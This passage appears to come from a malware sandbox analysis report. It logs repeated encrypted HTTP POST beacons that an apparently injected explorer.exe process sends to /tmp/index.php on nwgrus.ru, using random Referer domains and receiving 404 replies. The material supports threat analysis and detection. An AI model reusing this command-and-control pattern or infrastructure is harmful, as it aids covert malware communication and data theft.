                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              25192.168.2.550003119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:08:08.149559021 CEST281OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://rtsymdwebcyefo.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 210
                              Host: nwgrus.ru
                              Oct 12, 2024 20:08:08.149594069 CEST210OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 2b 1a cb af
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vu+V!wpyq$TCn*h_w/T?K7M7zq%5hB;R;J/\PHr
                              Oct 12, 2024 20:08:09.781217098 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:09 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              26192.168.2.550004119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:08:09.790385008 CEST280OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://cmpymujrwfied.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 173
                              Host: nwgrus.ru
                              Oct 12, 2024 20:08:09.790419102 CEST173OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 75 5d ea ee
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vuu]r_dQuX^Z/cFOF(+To$sf7[%,[.Z/
                              Oct 12, 2024 20:08:11.264607906 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:10 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              27192.168.2.550005119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:08:11.274945021 CEST280OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://mlfyuywbsduqi.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 308
                              Host: nwgrus.ru
                              Oct 12, 2024 20:08:11.274966955 CEST308OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 77 59 fa 81
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vuwYD)ZyBnsJ|{-fB;C\,7~S7*kC_6l498J_EwJgK8qHA`YdaH5T
                              Oct 12, 2024 20:08:12.806922913 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:12 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              28192.168.2.550006119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:08:12.816751003 CEST279OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://xasjtfaqoixq.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 117
                              Host: nwgrus.ru
                              Oct 12, 2024 20:08:12.816786051 CEST117OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 7b 02 d8 a5
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vu{~~OFvoO,nq
                              Oct 12, 2024 20:08:15.107202053 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:13 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                              Oct 12, 2024 20:08:15.107314110 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:13 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                              Oct 12, 2024 20:08:15.108445883 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:13 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              29192.168.2.550007119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:08:15.116512060 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://fedsyouolon.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 278
                              Host: nwgrus.ru
                              Oct 12, 2024 20:08:15.116561890 CEST278OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 56 37 d2 be
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vuV7uAOw6No~fDG~gR55t_RPPI<rO:q-wyl/--/b/CU?~yRhB^Ei
                              Oct 12, 2024 20:08:16.638910055 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:16 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              30192.168.2.550008119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:08:16.650084019 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://lbemhhdwkax.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 359
                              Host: nwgrus.ru
                              Oct 12, 2024 20:08:16.650121927 CEST359OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 33 36 e0 e9
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vu36d#MgaXM.9TLAuC-{E1OHD\]EspC!E9"F{Z~Th;h-zk(:s{k=EQR
                              Oct 12, 2024 20:08:18.120666981 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:17 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              31192.168.2.550009119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:08:18.140367031 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://tihslqvhibr.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 186
                              Host: nwgrus.ru
                              Oct 12, 2024 20:08:18.140367031 CEST186OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 25 48 ca ae
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vu%H)ldzD?!XLnn#`@Xs3*[=[]OUe_42F
                              Oct 12, 2024 20:08:19.640125990 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:19 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              32192.168.2.550010119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
